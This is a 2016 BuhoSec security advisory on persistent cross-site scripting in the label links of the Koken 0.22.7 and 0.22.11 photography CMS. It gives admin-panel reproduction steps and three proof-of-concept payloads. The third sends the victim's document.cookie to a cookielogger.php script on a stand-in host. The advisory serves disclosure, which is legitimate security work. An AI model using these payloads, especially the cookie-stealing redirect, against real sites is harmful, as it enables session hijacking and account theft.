____ _ _____ | _ \ | | / ____| | |_) |_ _| |__ ___| (___ ___ ___ | _ <| | | | '_ \ / _ \\___ \ / _ \/ __| | |_) | |_| | | | | (_) |___) | __/ (__ |____/ \__,_|_| |_|\___/_____/ \___|\___| Document Title: =============== Koken 0.22.7 & 0.22.11 Multiple Web Vulnerabilities Credits & Authors: ================== TaurusOmar - @TaurusOmar_ (taurusomar@buhosec.com) [taurusomar.buhosec.com] Release Date: ============= 2016-24-11 Product & Service Introduction: =============================== Built for photography: Your images are your most important asset. Koken treats them with the attention they deserve by including a full-featured management interface that looks and feels like a desktop application. Work and words, together: Write about portfolio updates, inspiration, or anything that comes to mind. Images, videos, slideshows and content from Flickr, Instagram, Vimeo, SoundCloud and Twitter are a snap to display. Live site previewing and editing: Setup your navigation, add pages, and edit your site's color and layout with simple point-and-click controls. No HTML experience required. Themes and plugins: Browse, select and install themes and plugins through an integrated store. Everything downloads and installs automatically to your Koken installation. Abstract Advisory Information: ============================== An independent researcher discovered multiple vulnerabilities in the official aplication My Koken 0.22.7 & 0.22.11 Vulnerability Disclosure Timeline: ================================== 2016-24-11: Public Disclosure Discovery Status: ================= Published Affected Product(s): ==================== Koken - Creative website publishing Product: Koken 0.22.7 & 0.22.11 http://koken.me/ Exploitation Technique: ======================= Local Severity Level: =============== medium Technical Details & Description: ================================ An application-side input validation web vulnerability has been discovered in the official Koken 0.22.7 The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module. The vulnerability exists in the text box labels links in which injects the code is activated when the web server option to transfer Request Method(s): [+] Export Vulnerable Module(s): [+] Add Label Links Vulnerable Parameter(s): [+] Label Link Box Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by local attackers with system user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. 1. Add new user o use account admin 2. Go to path http://tusitio.com/koken/admin/#/site/draft/theme/url:/ 3. On the menu Site > click to add Links/Footer or Links/Primary 4. In the section Label Links add you script 4. Successful reproduce of the persistent vulnerability! Proof of Concept (IMAGES): ========================== 1. http://i.imgur.com/AAcFkwP.png 2. http://i.imgur.com/d7LuGLN.png Vulnerability Code ======================= <a data-bind="css: { 'front-page': $data.front &amp;&amp; front }" class="item" href="#"><span class="in"><span data-bind="attr: { class: 'icon16 label-' + ($data.auto &amp;&amp; $data.auto === 'rss' ? 'rss' : 'chain') }, text: label" class="icon16 label-chain">VULNERABILITY_CODE</span><span class="front-mark">(front<span class="front-hidden">&nbsp;/&nbsp;hidden</span>)</span></span></a> PoC_1: Persistent Cross Site Scripting / Path / Footer ====================================================== <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object> PoC_2: Persistent Cross Site Scripting / Path / Primaty ======================================================= <script>alert(String.fromCharCode(88,83,83))</script> PoC_3:Hijacking Vulnerability / Path/ Any ======================================================= <script>document.location="http://www.tusitio.com/cookielogger.php?cookie=" + document.cookie;</script> Security Risk: ============== The security risk of the persistent input validation vulnerability in the name value is estimated as medium.